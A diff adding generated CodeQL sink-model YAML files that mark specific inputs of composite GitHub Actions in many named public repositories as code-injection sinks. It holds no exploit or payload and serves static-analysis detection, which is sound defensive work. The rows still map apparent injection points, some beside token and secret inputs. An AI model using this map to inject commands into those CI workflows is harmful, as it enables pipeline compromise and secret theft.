@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml new file mode 100644 index 00000000000..2ede3df9864 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml new file mode 100644 index 00000000000..1bea0aef935 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml new file mode 100644 index 00000000000..4a8bae9d2a1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml new file mode 100644 index 00000000000..c63ed017ae1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml new file mode 100644 index 00000000000..544fc4b9951 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml new file mode 100644 index 00000000000..2d3871a2231 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml new file mode 100644 index 00000000000..4f18723df38 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml new file mode 100644 index 00000000000..a96d86c7b5c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml new file mode 100644 index 00000000000..ff1b101be4a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml new file mode 100644 index 00000000000..fb7bdd0950e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml new file mode 100644 index 00000000000..9b263d03357 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml new file mode 100644 index 00000000000..5e6e66c4be4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml new file mode 100644 index 00000000000..cf545a95592 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml new file mode 100644 index 00000000000..0484e903515 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml new file mode 100644 index 00000000000..756a1a0371a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml new file mode 100644 index 00000000000..ed954bf6f97 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml new file mode 100644 index 00000000000..47aebb45825 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml new file mode 100644 index 00000000000..28935d7a98b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml new file mode 100644 index 00000000000..2ba9ff355e2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml new file mode 100644 index 00000000000..530cc68ca4b --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml new file mode 100644 index 00000000000..e75197656f5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml new file mode 100644 index 00000000000..b56944cd0ff --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml new file mode 100644 index 00000000000..e6d2a79b847 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml new file mode 100644 index 00000000000..ffd74df05e2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml new file mode 100644 index 00000000000..f476d7160f6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml new file mode 100644 index 00000000000..e95dacb65a9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml new file mode 100644 index 00000000000..42a9859aa23 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml new file mode 100644 index 00000000000..029e4f95a2a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml new file mode 100644 index 00000000000..3223e185c7b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml new file mode 100644 index 00000000000..26fa1ce22b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml new file mode 100644 index 00000000000..a68a3372089 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml new file mode 100644 index 00000000000..6c874d64655 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml new file mode 100644 index 00000000000..8d339364cf3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml new file mode 100644 index 00000000000..db6751f8ef5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml new file mode 100644 index 00000000000..68959bf2102 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml new file mode 100644 index 00000000000..f8aa8480088 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml new file mode 100644 index 00000000000..0f78fddcd96 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml new file mode 100644 index 00000000000..9eb860b13d9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml new file mode 100644 index 00000000000..573b256121f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml new file mode 100644 index 00000000000..c5278340c0b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml new file mode 100644 index 00000000000..b11973cfa00 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml new file mode 100644 index 00000000000..1fd3ca1f005 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml new file mode 100644 index 00000000000..727a21ac960 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml new file mode 100644 index 00000000000..fff6557dd41 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml new file mode 100644 index 00000000000..e87c7cf5c06 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git 